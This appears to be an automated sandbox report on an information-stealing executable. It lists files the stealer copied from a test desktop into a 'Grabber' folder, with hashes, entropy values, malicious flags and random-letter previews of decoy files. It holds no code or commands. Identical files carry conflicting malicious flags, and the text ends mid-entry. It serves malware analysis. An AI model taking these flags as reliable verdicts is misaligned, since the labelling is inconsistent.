SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	true
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	true
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\KLIZUSIQEN.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\ZGGKNSUKOP.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	true
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EOWRVPQCCS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
